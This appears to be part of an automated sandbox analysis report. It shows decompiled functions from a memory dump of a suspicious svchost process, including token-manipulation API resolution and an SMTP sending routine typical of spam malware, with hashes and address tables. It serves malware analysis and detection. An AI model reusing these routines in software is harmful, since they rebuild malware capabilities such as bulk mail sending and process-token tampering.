                                                                                0x00000000
                                                                                0x0012114f
                                                                                0x0012114f
                                                                                0x0012115b
                                                                                0x00121160
                                                                                0x00121162
                                                                                0x00121169
                                                                                0x00000000
                                                                                0x0012116f
                                                                                0x0012116f
                                                                                0x0012117b
                                                                                0x00121180
                                                                                0x00121182
                                                                                0x00121189
                                                                                0x00000000
                                                                                0x0012118f
                                                                                0x0012118f
                                                                                0x0012119a
                                                                                0x0012119f
                                                                                0x001211a1
                                                                                0x001211a8
                                                                                0x00000000
                                                                                0x001211ae
                                                                                0x001211ae
                                                                                0x001211ba
                                                                                0x001211bf
                                                                                0x001211c1
                                                                                0x001211c8
                                                                                0x00000000
                                                                                0x001211ce
                                                                                0x001211ce
                                                                                0x001211da
                                                                                0x001211df
                                                                                0x001211e1
                                                                                0x001211e8
                                                                                0x00000000
                                                                                0x001211ee
                                                                                0x001211ee
                                                                                0x001211f9
                                                                                0x001211fe
                                                                                0x00121200
                                                                                0x00121207
                                                                                0x00000000
                                                                                0x00121209
                                                                                0x00121209
                                                                                0x00121215
                                                                                0x0012121a
                                                                                0x0012121c
                                                                                0x00121223
                                                                                0x00000000
                                                                                0x00121225
                                                                                0x00121225
                                                                                0x00121231
                                                                                0x00121236
                                                                                0x00121238
                                                                                0x0012123f
                                                                                0x00000000
                                                                                0x00121241
                                                                                0x00121241
                                                                                0x0012124c
                                                                                0x00121251
                                                                                0x00121253
                                                                                0x0012125a
                                                                                0x00000000
                                                                                0x0012125c
                                                                                0x0012125c
                                                                                0x00121268
                                                                                0x0012126d
                                                                                0x0012126f
                                                                                0x00121276
                                                                                0x00121276
                                                                                0x00121279
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00121279
                                                                                0x0012125a
                                                                                0x0012123f
                                                                                0x00121223
                                                                                0x00121207
                                                                                0x001211e8
                                                                                0x001211c8
                                                                                0x001211a8
                                                                                0x00121189
                                                                                0x00121169
                                                                                0x00121149
                                                                                0x0012112a
                                                                                0x0012110a
                                                                                0x001210ea
                                                                                0x0012127f
                                                                                0x001210ae
                                                                                0x001210b4
                                                                                0x001210b4
                                                                                0x0012100d
                                                                                0x00121012
                                                                                0x00121018
                                                                                0x0012101f
                                                                                0x00000000
                                                                                0x00121022
                                                                                0x00121022
                                                                                0x00121022
                                                                                0x0012101f

                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(ntdll.dll,00000000,00121839,00129646), ref: 00121012
                                                                                • GetProcAddress.KERNEL32(00000000,RtlExpandEnvironmentStrings_U), ref: 001210C2
                                                                                • GetProcAddress.KERNEL32(00000000,RtlSetLastWin32Error), ref: 001210E1
                                                                                • GetProcAddress.KERNEL32(00000000,NtTerminateProcess), ref: 00121101
                                                                                • GetProcAddress.KERNEL32(00000000,RtlFreeSid), ref: 00121121
                                                                                • GetProcAddress.KERNEL32(00000000,RtlInitUnicodeString), ref: 00121140
                                                                                • GetProcAddress.KERNEL32(00000000,NtSetInformationThread), ref: 00121160
                                                                                • GetProcAddress.KERNEL32(00000000,NtSetInformationToken), ref: 00121180
                                                                                • GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 0012119F
                                                                                • GetProcAddress.KERNEL32(00000000,NtClose), ref: 001211BF
                                                                                • GetProcAddress.KERNEL32(00000000,NtOpenProcessToken), ref: 001211DF
                                                                                • GetProcAddress.KERNEL32(00000000,NtDuplicateToken), ref: 001211FE
                                                                                • GetProcAddress.KERNEL32(00000000,RtlAllocateAndInitializeSid), ref: 0012121A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressProc$LibraryLoad
                                                                                • String ID: NtClose$NtDuplicateToken$NtFilterToken$NtOpenProcessToken$NtQueryInformationToken$NtSetInformationThread$NtSetInformationToken$NtTerminateProcess$RtlAllocateAndInitializeSid$RtlExpandEnvironmentStrings_U$RtlFreeSid$RtlInitUnicodeString$RtlLengthSid$RtlNtStatusToDosError$RtlSetLastWin32Error$ntdll.dll
                                                                                • API String ID: 2238633743-3228201535
                                                                                • Opcode ID: f5a8ff9b856aa010d6783076c393b5fb6a9bd67ff522e39b46b0cdf98afdfe15
                                                                                • Instruction ID: fb4a2f74bd3b0ad01997a67f1f505948af8cee3f99055328b876caa15c1230a1
                                                                                • Opcode Fuzzy Hash: f5a8ff9b856aa010d6783076c393b5fb6a9bd67ff522e39b46b0cdf98afdfe15
                                                                                • Instruction Fuzzy Hash: E0515F71642A12FAD725CB6CBC4079636E87758329F24035AE530D2AF0E7F4CAC2CB59
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0012B211 Relevance: 47.4, APIs: 7, Strings: 20, Instructions: 131timeCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 91%
                                                                                			E0012B211(FILETIME* _a4, CHAR* _a8, signed int _a12) {
				struct _FILETIME _v12;
				struct _SYSTEMTIME _v28;
				CHAR* _v32;
				CHAR* _v36;
				CHAR* _v40;
				CHAR* _v44;
				CHAR* _v48;
				CHAR* _v52;
				CHAR* _v56;
				CHAR* _v60;
				CHAR* _v64;
				CHAR* _v68;
				CHAR* _v72;
				CHAR* _v76;
				CHAR* _v80;
				CHAR* _v84;
				CHAR* _v88;
				CHAR* _v92;
				CHAR* _v96;
				CHAR* _v100;
				CHAR* _v104;
				struct _TIME_ZONE_INFORMATION _v276;
				long _t77;
				signed int _t80;
				signed int _t93;
				signed int _t101;
				signed int _t102;
				CHAR* _t103;
				signed int _t104;
				signed short _t106;
				signed short _t109;
				signed int _t114;
				signed int _t115;
				void* _t117;

				_v56 = "Sun";
				_v52 = "Mon";
				_v48 = "Tue";
				_v44 = "Wed";
				_v40 = "Thu";
				_v36 = "Fri";
				_v32 = "Sat";
				_v104 = "Jan";
				_v100 = "Feb";
				_v96 = "Mar";
				_v92 = "Apr";
				_v88 = "May";
				_v84 = "Jun";
				_v80 = "Jul";
				_v76 = "Aug";
				_v72 = "Sep";
				_v68 = "Oct";
				_v64 = "Nov";
				_v60 = "Dec";
				if(_a4 != 0) {
					FileTimeToLocalFileTime(_a4,  &_v12);
					FileTimeToSystemTime( &_v12,  &_v28);
				} else {
					GetLocalTime( &_v28);
				}
				_t114 = _a12;
				if(_t114 != 0) {
					SystemTimeToFileTime( &_v28,  &_v12);
					_t93 = E0012ECA5();
					if(_t114 <= 0) {
						_t104 = _t93 %  ~_t114 * 0x23c34600;
						_v12.dwLowDateTime = _v12.dwLowDateTime - _t104;
						asm("sbb [ebp-0x4], ebx");
					} else {
						_t104 = _t93 % _t114 * 0x23c34600;
						_v12.dwLowDateTime = _v12.dwLowDateTime + _t104;
						asm("adc [ebp-0x4], ebx");
					}
					FileTimeToSystemTime( &_v12,  &_v28);
				}
				_v276.Bias = 0;
				_t77 = GetTimeZoneInformation( &_v276);
				_t101 = _v276.Bias;
				if(_t77 == 2) {
					_t101 = _t101 + _v276.DaylightBias;
				}
				_t102 =  ~_t101;
				asm("cdq");
				_t80 = (_t102 ^ _t104) - _t104;
				if(_v28.wDayOfWeek > 6) {
					_t109 = 6;
					_v28.wDayOfWeek = _t109;
				}
				if(_v28.wMonth == 0) {
					_v28.wMonth = 1;
				}
				if(_v28.wMonth > 0xc) {
					_t106 = 0xc;
					_v28.wMonth = _t106;
				}
				_t103 = "+";
				if(_t102 < 0) {
					_t103 = "-";
				}
				_t115 = 0x3c;
				asm("cdq");
				return wsprintfA(_a8, "%s, %u %s %u %.2u:%.2u:%.2u %s%.2u%.2u",  *((intOrPtr*)(_t117 + (_v28.wDayOfWeek & 0x0000ffff) * 4 - 0x34)), _v28.wDay & 0x0000ffff,  *((intOrPtr*)(_t117 + (_v28.wMonth & 0x0000ffff) * 4 - 0x68)), _v28.wYear & 0x0000ffff, _v28.wHour & 0x0000ffff, _v28.wMinute & 0x0000ffff, _v28.wSecond & 0x0000ffff, _t103, _t80 / _t115, _t80 % _t115);
			}





































                                                                                0x0012b225
                                                                                0x0012b22c
                                                                                0x0012b233
                                                                                0x0012b23a
                                                                                0x0012b241
                                                                                0x0012b248
                                                                                0x0012b24f
                                                                                0x0012b256
                                                                                0x0012b25d
                                                                                0x0012b264
                                                                                0x0012b26b
                                                                                0x0012b272
                                                                                0x0012b279
                                                                                0x0012b280
                                                                                0x0012b287
                                                                                0x0012b28e
                                                                                0x0012b295
                                                                                0x0012b29c
                                                                                0x0012b2a3
                                                                                0x0012b2ad
                                                                                0x0012b2c2
                                                                                0x0012b2d0
                                                                                0x0012b2af
                                                                                0x0012b2b3
                                                                                0x0012b2b3
                                                                                0x0012b2d2
                                                                                0x0012b2d7
                                                                                0x0012b2e1
                                                                                0x0012b2e7
                                                                                0x0012b2f0
                                                                                0x0012b306
                                                                                0x0012b30c
                                                                                0x0012b30f
                                                                                0x0012b2f2
                                                                                0x0012b2f4
                                                                                0x0012b2fa
                                                                                0x0012b2fd
                                                                                0x0012b2fd
                                                                                0x0012b31a
                                                                                0x0012b31a
                                                                                0x0012b323
                                                                                0x0012b329
                                                                                0x0012b32f
                                                                                0x0012b338
                                                                                0x0012b33a
                                                                                0x0012b33a
                                                                                0x0012b33d
                                                                                0x0012b341
                                                                                0x0012b344
                                                                                0x0012b34b
                                                                                0x0012b34f
                                                                                0x0012b350
                                                                                0x0012b350
                                                                                0x0012b358
                                                                                0x0012b35d
                                                                                0x0012b35d
                                                                                0x0012b366
                                                                                0x0012b36a
                                                                                0x0012b36b
                                                                                0x0012b36b
                                                                                0x0012b371
                                                                                0x0012b376
                                                                                0x0012b378
                                                                                0x0012b378
                                                                                0x0012b37f
                                                                                0x0012b380
                                                                                0x0012b3c4

                                                                                APIs
                                                                                • GetLocalTime.KERNEL32(?), ref: 0012B2B3
                                                                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0012B2C2
                                                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 0012B2D0
                                                                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 0012B2E1
                                                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 0012B31A
                                                                                • GetTimeZoneInformation.KERNEL32(?), ref: 0012B329
                                                                                • wsprintfA.USER32 ref: 0012B3B7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Time$File$System$Local$InformationZonewsprintf
                                                                                • String ID: %s, %u %s %u %.2u:%.2u:%.2u %s%.2u%.2u$Apr$Aug$Dec$Feb$Fri$Jan$Jul$Jun$Mar$May$Mon$Nov$Oct$Sat$Sep$Sun$Thu$Tue$Wed
                                                                                • API String ID: 766114626-2976066047
                                                                                • Opcode ID: f19a63bb8b83fe1697266c2f7eac72d38bab808138c82a3de0336109d1f2430b
                                                                                • Instruction ID: 3cd415f4058681b7ae059af1e853370b33ac665ce6571c9f49053b278d257e12
                                                                                • Opcode Fuzzy Hash: f19a63bb8b83fe1697266c2f7eac72d38bab808138c82a3de0336109d1f2430b
                                                                                • Instruction Fuzzy Hash: C65128B1D0022CABCF16DFD5D9988EEBBF9BF4C314F1051A9E601B6150D3B49A99CB90
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00126511 Relevance: 42.2, APIs: 14, Strings: 10, Instructions: 182COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 57%
                                                                                			E00126511(void* __ecx) {
				signed int _t75;
				signed int _t76;
				int _t78;
				void* _t83;
				signed int _t93;
				void* _t95;
				signed int _t99;
				int _t101;
				int _t115;
				int _t117;
				void* _t118;
				void* _t119;
				void* _t120;
				void* _t122;
				intOrPtr _t135;
				intOrPtr* _t137;
				void* _t139;
				void* _t141;
				void* _t143;
				void* _t144;
				void* _t152;

				_t122 = __ecx;
				_t139 = _t141 - 0x74;
				_t75 =  *(_t139 + 0x7c);
				_t135 =  *((intOrPtr*)(_t75 + 4));
				_t76 =  *_t75;
				 *(_t139 + 0x7c) = _t76;
				_t78 = wsprintfA(_t139 - 0x898, "\nver=%d date=%s %s\nc=%08x a=%p", 0x61, "Jan 13 2018", "12:08:32",  *_t76,  *((intOrPtr*)(_t76 + 0xc)));
				_t143 = _t141 - 0x90c + 0x1c;
				_t117 = _t78;
				if(IsBadReadPtr( *( *(_t139 + 0x7c) + 0xc), 8) != 0) {
					E0012E318();
					ExitProcess(0);
				}
				_t83 =  *( *(_t139 + 0x7c) + 0xc);
				__imp__#8( *((intOrPtr*)(_t83 + 4)), E00126511);
				__imp__#8();
				_t118 = _t117 + wsprintfA(_t139 + _t117 - 0x898, " va=%08X%08X uef=%p",  *( *(_t139 + 0x7c) + 0xc),  *( *( *(_t139 + 0x7c) + 0xc)), _t83);
				_t119 = _t118 + wsprintfA(_t139 + _t118 - 0x898, "\n_ax=%p\t_bx=%p\t_cx=%p\t_dx=%p\t_si=%p\t_di=%p\t_bp=%p\t_sp=%p\n",  *((intOrPtr*)(_t135 + 0xb0)),  *((intOrPtr*)(_t135 + 0xa4)),  *((intOrPtr*)(_t135 + 0xac)),  *((intOrPtr*)(_t135 + 0xa8)),  *((intOrPtr*)(_t135 + 0xa0)),  *((intOrPtr*)(_t135 + 0x9c)),  *((intOrPtr*)(_t135 + 0xb4)),  *((intOrPtr*)(_t135 + 0xc4)));
				E0012EE2A(_t122, _t139 - 0x98, 0, 0x108);
				_t144 = _t143 + 0x48;
				 *((intOrPtr*)(_t139 - 0x98)) =  *((intOrPtr*)(_t135 + 0xb8));
				_t93 = 3;
				_push(0);
				_push(0);
				 *(_t139 - 0x8c) = _t93;
				 *((intOrPtr*)(_t139 - 0x94)) = 0;
				_push(0);
				 *(_t139 - 0x5c) = _t93;
				_push(0);
				 *((intOrPtr*)(_t139 - 0x68)) =  *((intOrPtr*)(_t135 + 0xc4));
				 *((intOrPtr*)(_t139 - 0x64)) = 0;
				_t130 =  *((intOrPtr*)(_t135 + 0xb4));
				 *(_t139 - 0x6c) = _t93;
				 *(_t139 + 0x7c) = _t93;
				_push(_t135);
				_push(_t139 - 0x98);
				 *((intOrPtr*)(_t139 - 0x78)) =  *((intOrPtr*)(_t135 + 0xb4));
				 *((intOrPtr*)(_t139 - 0x74)) = 0;
				_push(0);
				while(1) {
					_t95 = GetCurrentProcess();
					__imp__StackWalk64(0x14c, _t95);
					if(_t95 == 0) {
						break;
					}
					_t95 = 0;
					if( *(_t139 + 0x7c) != 0) {
						if( *((intOrPtr*)(_t139 - 0x88)) != 0) {
							_t115 = wsprintfA(_t139 + _t119 - 0x898, "ret=%p\tp1=%p\tp2=%p\tp3=%p\tp4=%p\n",  *((intOrPtr*)(_t139 - 0x88)),  *((intOrPtr*)(_t139 - 0x40)),  *((intOrPtr*)(_t139 - 0x38)),  *((intOrPtr*)(_t139 - 0x30)),  *((intOrPtr*)(_t139 - 0x28)));
							_t144 = _t144 + 0x1c;
							_t119 = _t119 + _t115;
							_t95 = 0;
						}
						 *(_t139 + 0x7c) =  *(_t139 + 0x7c) - 1;
						_push(_t95);
						_push(_t95);
						_push(_t95);
						_push(_t95);
						_push(_t135);
						_push(_t139 - 0x98);
						_push(_t95);
						continue;
					}
					break;
				}
				 *(_t139 + 0x7c) = _t95;
				_t120 = _t119 + wsprintfA(_t139 + _t119 - 0x898, "plgs:");
				 *(_t139 + 0x70) =  *(_t139 + 0x70) & 0x00000000;
				do {
					_t137 = 0x132c40 +  *(_t139 + 0x70) * 4;
					if( *_t137 != 0) {
						_t99 =  *(_t139 + 0x7c) & 0x80000007;
						if(_t99 < 0) {
							_t152 = (_t99 - 0x00000001 | 0xfffffff8) + 1;
						}
						if(_t152 == 0) {
							_t120 = _t120 + wsprintfA(_t139 + _t120 - 0x898, "\n");
						}
						_t101 = wsprintfA(_t139 + _t120 - 0x898, "\t%d=%p",  *(_t139 + 0x70),  *_t137);
						_t144 = _t144 + 0x10;
						_t120 = _t120 + _t101;
						 *(_t139 + 0x7c) =  *(_t139 + 0x7c) + 1;
					}
					 *(_t139 + 0x70) =  *(_t139 + 0x70) + 1;
				} while ( *(_t139 + 0x70) < 0x20);
				wsprintfA(_t139 + _t120 - 0x898, "\n");
				E0012E8A1(_t130, 1, "localcfg", "except_info", _t139 - 0x898);
				E0012E318();
				return 1;
			}
























                                                                                0x00126511
                                                                                0x00126512
                                                                                0x0012651c
                                                                                0x00126521
                                                                                0x00126524
                                                                                0x00126532
                                                                                0x0012654d
                                                                                0x0012654f
                                                                                0x00126552
                                                                                0x00126564
                                                                                0x0012674e
                                                                                0x00126755
                                                                                0x00126755
                                                                                0x0012656d
                                                                                0x00126578
                                                                                0x00126587
                                                                                0x001265a3
                                                                                0x001265e3
                                                                                0x001265ee
                                                                                0x001265f9
                                                                                0x00126600
                                                                                0x00126606
                                                                                0x00126607
                                                                                0x00126608
                                                                                0x00126609
                                                                                0x0012660f
                                                                                0x0012661b
                                                                                0x0012661c
                                                                                0x0012661f
                                                                                0x00126620
                                                                                0x00126623
                                                                                0x00126626
                                                                                0x0012662c
                                                                                0x0012662f
                                                                                0x00126632
                                                                                0x00126639
                                                                                0x0012663a
                                                                                0x0012663d
                                                                                0x00126640
                                                                                0x0012668a
                                                                                0x0012668a
                                                                                0x00126696
                                                                                0x0012669e
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00126643
                                                                                0x00126648
                                                                                0x00126650
                                                                                0x00126671
                                                                                0x00126673
                                                                                0x00126676
                                                                                0x00126678
                                                                                0x00126678
                                                                                0x0012667a
                                                                                0x0012667d
                                                                                0x0012667e
                                                                                0x0012667f
                                                                                0x00126680
                                                                                0x00126681
                                                                                0x00126688
                                                                                0x00126689
                                                                                0x00000000
                                                                                0x00126689
                                                                                0x00000000
                                                                                0x00126648
                                                                                0x001266a0
                                                                                0x001266b3
                                                                                0x001266b5
                                                                                0x001266ba
                                                                                0x001266bd
                                                                                0x001266c7
                                                                                0x001266cc
                                                                                0x001266d1
                                                                                0x001266d7
                                                                                0x001266d7
                                                                                0x001266d8
                                                                                0x001266eb
                                                                                0x001266eb
                                                                                0x001266ff
                                                                                0x00126701
                                                                                0x00126704
                                                                                0x00126706
                                                                                0x00126706
                                                                                0x00126709
                                                                                0x0012670c
                                                                                0x0012671f
                                                                                0x00126734
                                                                                0x0012673c
                                                                                0x0012674b

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: wsprintf$Processhtonl$CurrentExitReadStackWalk64
                                                                                • String ID: %d=%p$_ax=%p_bx=%p_cx=%p_dx=%p_si=%p_di=%p_bp=%p_sp=%p$ver=%d date=%s %sc=%08x a=%p$ va=%08X%08X uef=%p$12:08:32$Jan 13 2018$except_info$localcfg$plgs:$ret=%pp1=%pp2=%pp3=%pp4=%p
                                                                                • API String ID: 2400214276-165278494
                                                                                • Opcode ID: d2b137954edf8a0f71e75d9c59e87f01d5188342ab5a8c464245c79ba4a898c4
                                                                                • Instruction ID: c161f2037cd168e7bfe8fb5152d313ea29cf119f0ef8d2e237734cf2f63c4fca
                                                                                • Opcode Fuzzy Hash: d2b137954edf8a0f71e75d9c59e87f01d5188342ab5a8c464245c79ba4a898c4
                                                                                • Instruction Fuzzy Hash: B8614B72A50218AFDB619FB4EC45FEA77F9FB08300F148069F969D21A1EB7199508F60
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0012A7C1 Relevance: 40.5, APIs: 8, Strings: 15, Instructions: 299networkstringCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 56%
                                                                                			E0012A7C1(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, CHAR* _a16) {
				short _v129;
				char _v132;
				char _v1156;
				signed int _t59;
				int _t60;
				void* _t61;
				char* _t62;
				signed int _t63;
				void* _t65;
				signed int _t68;
				signed int _t74;
				signed int _t76;
				signed int _t78;
				signed int _t80;
				void* _t82;
				signed int _t85;
				signed int _t87;
				signed int _t92;
				void* _t96;
				intOrPtr _t102;
				signed int _t103;
				void* _t104;
				int _t121;
				intOrPtr _t123;
				void* _t124;
				CHAR* _t125;
				intOrPtr* _t126;
				intOrPtr* _t127;
				signed int _t129;
				void* _t130;
				void* _t131;

				_t102 = _a8;
				_t59 = _t102 - 1;
				_t125 =  &_v132;
				if(_t59 > 0xb) {
					L21:
					_t60 = lstrlenA(_t125);
					_t121 = _t60;
					_t126 = __imp__#19;
					_t61 =  *_t126(_a4, _t125, _t121, 0);
					if(_t61 == _t121) {
						__eflags = _t102 - 6;
						if(_t102 != 6) {
							L28:
							_t127 = __imp__#16;
							_t103 = 0;
							_push(0);
							_v1156 = 0;
							_v132 = 0;
							_push(0x3f6);
							_t62 =  &_v1156;
							while(1) {
								_t63 =  *_t127(_a4, _t62);
								__eflags = _t63;
								if(_t63 <= 0) {
									break;
								}
								_t103 = _t103 + _t63;
								__eflags = _t103 - 0x1f4;
								if(_t103 > 0x1f4) {
									wsprintfA(_a16, "Too big smtp respons (%d bytes)\n", _t103);
									_push(6);
									L72:
									_pop(_t65);
									return _t65;
								}
								__eflags = _v132;
								 *((char*)(_t130 + _t103 - 0x480)) = 0;
								if(_v132 != 0) {
									L33:
									_t68 = E0012EE95( &_v1156,  &_v132);
									__eflags = _t68;
									if(_t68 != 0) {
										break;
									}
									L34:
									_t92 = 0x3f6 - _t103;
									__eflags = _t92;
									_push(0);
									_push(_t92);
									_t62 = _t130 + _t103 - 0x480;
									continue;
								}
								__eflags = _t103 - 3;
								if(_t103 <= 3) {
									goto L34;
								}
								E0012EE08( &_v132,  &_v1156, 4);
								_t131 = _t131 + 0xc;
								__eflags = _v132;
								_v129 = 0x20;
								if(_v132 == 0) {
									goto L34;
								}
								goto L33;
							}
							_t123 = _a8;
							__eflags = _t123 - 7;
							if(_t123 == 7) {
								L23:
								_push(2);
								goto L72;
							}
							__eflags = _t103 - 5;
							if(_t103 <= 5) {
								E0012EF00(_a16, "Too small respons\n");
							} else {
								E0012EE08(_a16,  &_v1156, 0x76);
								_t131 = _t131 + 0xc;
								_a16[0x76] = 0;
							}
							__eflags = _t103 - 5;
							if(_t103 < 5) {
								L71:
								E0012EF00(_a16, "Incorrect respons");
								_push(7);
								goto L72;
							} else {
								__eflags =  *((char*)(_t130 + _t103 - 0x481)) - 0xa;
								if( *((char*)(_t130 + _t103 - 0x481)) != 0xa) {
									goto L71;
								}
								_t104 = E0012EDAC( &_v1156);
								__eflags = _t104 - 0xdc;
								if(_t104 == 0xdc) {
									L50:
									_t129 = 1;
									_t74 = E0012EE95( &_v1156, "ESMTP");
									__eflags = _t74;
									_t52 = _t74 != 0;
									__eflags = _t52;
									 *0x133668 = _t74 & 0xffffff00 | _t52;
									_t123 = 1;
									L51:
									__eflags = _t123 - 0xc;
									if(_t123 != 0xc) {
										L54:
										__eflags = _t129;
										if(_t129 != 0) {
											goto L23;
										}
										_t76 =  *0x133630; // 0x0
										__eflags = _t76;
										if(_t76 == 0) {
											L70:
											_push(0xb);
											goto L72;
										}
										__eflags =  *0x133634 - _t129; // 0x0
										if(__eflags == 0) {
											goto L70;
										}
										__eflags =  *0x133638 - _t129; // 0x0
										if(__eflags == 0) {
											goto L70;
										}
										__eflags = _t123 - 4;
										if(_t123 != 4) {
											L61:
											_t78 = E0012A699( &_v1156,  *0x133634);
											__eflags = _t78;
											if(_t78 == 0) {
												_t80 = E0012A699( &_v1156,  *0x133638);
												__eflags = _t80;
												if(_t80 == 0) {
													__eflags = _t123 - 3;
													if(_t123 == 3) {
														L69:
														_t82 = E0012E819(1, "localcfg", "ip", E001230B5());
														_push( &_v132);
														_t85 = E0012EE95( &_v1156, E0012A7A3(_t82, _t82));
														__eflags = _t85;
														if(_t85 != 0) {
															goto L62;
														}
														goto L70;
													}
													__eflags = _t123 - 4;
													if(_t123 == 4) {
														goto L69;
													}
													__eflags = _t123 - 5;
													if(_t123 == 5) {
														goto L69;
													}
													__eflags = _t123 - 6;
													if(_t123 != 6) {
														goto L70;
													}
													goto L69;
												}
												_push(0xa);
												goto L72;
											}
											L62:
											_push(9);
											goto L72;
										}
										_t87 = E0012A699( &_v1156, _t76);
										__eflags = _t87;
										if(_t87 == 0) {
											goto L61;
										}
										_push(8);
										goto L72;
									}
									__eflags = _t104 - 0x217;
									if(_t104 != 0x217) {
										goto L54;
									}
									_push(0xf);
									goto L72;
								}
								__eflags = _t104 - 0xfa;
								if(_t104 == 0xfa) {
									goto L50;
								}
								__eflags = _t104 - 0x162;
								if(_t104 == 0x162) {
									goto L50;
								}
								__eflags = _t104 - 0xdd;
								if(_t104 == 0xdd) {
									goto L50;
								}
								__eflags = _t104 - 0x14e;
								if(_t104 == 0x14e) {
									goto L50;
								}
								__eflags = _t104 - 0xeb;
								if(_t104 == 0xeb) {
									goto L50;
								}
								_t129 = 0;
								goto L51;
							}
						}
						_t124 = 5;
						_t96 =  *_t126(_a4, "\r\n.\r\n", _t124, 0);
						__eflags = _t96 - _t124;
						if(_t96 == _t124) {
							goto L28;
						}
						wsprintfA(_a16, "Error sending command (sent = %d/%d)\n", _t96, _t124);
						return _t124;
					}
					if(_t102 != 7) {
						wsprintfA(_a16, "Error sending command (sent = %d/%d)\n", _t61, _t121);
						_push(5);
						goto L72;
					}
					goto L23;
				}
				switch( *((intOrPtr*)(_t59 * 4 +  &M0012AB51))) {
					case 0:
						goto L28;
					case 1:
						_push(_a12);
						_t100 =  &_v132;
						if( *0x133668 == 0) {
							_push("helo %s\r\n");
						} else {
							_push("ehlo %s\r\n");
						}
						goto L4;
					case 2:
						_push(_a12);
						_push("mail from:<%s>\r\n");
						goto L14;
					case 3:
						_push(_a12);
						_push("rcpt to:<%s>\r\n");
						L14:
						__eax =  &_v132;
						L4:
						wsprintfA(_t100, ??);
						goto L20;
					case 4:
						_push(7);
						_push("data\r\n");
						goto L19;
					case 5:
						goto L21;
					case 6:
						_push(7);
						_push("quit\r\n");
						goto L19;
					case 7:
						goto L21;
					case 8:
						_push(0xd);
						_push("AUTH LOGIN\r\n");
						L19:
						__eax =  &_v132;
						_push( &_v132);
						__eax = E0012EE08();
						goto L20;
					case 9:
						__eax = _a12;
						__edx = __eax + 1;
						do {
							__cl =  *__eax;
							__eax = __eax + 1;
							__eflags = __cl;
						} while (__cl != 0);
						goto L9;
					case 0xa:
						__eax = _a12;
						__edx = __eax + 1;
						do {
							__cl =  *__eax;
							__eax = __eax + 1;
							__eflags = __cl;
						} while (__cl != 0);
						L9:
						__eax = __eax - __edx;
						 *((char*)(__ebp + __eax - 0x80)) = 0;
						L20:
						_t131 = _t131 + 0xc;
						goto L21;
				}
			}


































                                                                                0x0012a7cb
                                                                                0x0012a7cf
                                                                                0x0012a7d3
                                                                                0x0012a7d9
                                                                                0x0012a87d
                                                                                0x0012a87e
                                                                                0x0012a886
                                                                                0x0012a88d
                                                                                0x0012a893
                                                                                0x0012a897
                                                                                0x0012a8bf
                                                                                0x0012a8c2
                                                                                0x0012a8f2
                                                                                0x0012a8f2
                                                                                0x0012a8f8
                                                                                0x0012a8fa
                                                                                0x0012a900
                                                                                0x0012a906
                                                                                0x0012a909
                                                                                0x0012a90a
                                                                                0x0012a978
                                                                                0x0012a97c
                                                                                0x0012a97e
                                                                                0x0012a980
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012a912
                                                                                0x0012a914
                                                                                0x0012a91a
                                                                                0x0012a9b9
                                                                                0x0012a9c2
                                                                                0x0012ab4a
                                                                                0x0012ab4a
                                                                                0x00000000
                                                                                0x0012ab4a
                                                                                0x0012a920
                                                                                0x0012a924
                                                                                0x0012a92c
                                                                                0x0012a954
                                                                                0x0012a95f
                                                                                0x0012a966
                                                                                0x0012a968
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012a96a
                                                                                0x0012a96c
                                                                                0x0012a96c
                                                                                0x0012a96e
                                                                                0x0012a970
                                                                                0x0012a971
                                                                                0x00000000
                                                                                0x0012a971
                                                                                0x0012a92e
                                                                                0x0012a931
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012a940
                                                                                0x0012a945
                                                                                0x0012a948
                                                                                0x0012a94c
                                                                                0x0012a952
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012a952
                                                                                0x0012a982
                                                                                0x0012a985
                                                                                0x0012a988
                                                                                0x0012a89e
                                                                                0x0012a89e
                                                                                0x00000000
                                                                                0x0012a89e
                                                                                0x0012a98e
                                                                                0x0012a991
                                                                                0x0012a9d1
                                                                                0x0012a993
                                                                                0x0012a99f
                                                                                0x0012a9a7
                                                                                0x0012a9aa
                                                                                0x0012a9aa
                                                                                0x0012a9d8
                                                                                0x0012a9db
                                                                                0x0012ab39
                                                                                0x0012ab41
                                                                                0x0012ab48
                                                                                0x00000000
                                                                                0x0012a9e1
                                                                                0x0012a9e1
                                                                                0x0012a9e9
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012a9fb
                                                                                0x0012a9fe
                                                                                0x0012aa04
                                                                                0x0012aa32
                                                                                0x0012aa40
                                                                                0x0012aa41
                                                                                0x0012aa46
                                                                                0x0012aa49
                                                                                0x0012aa49
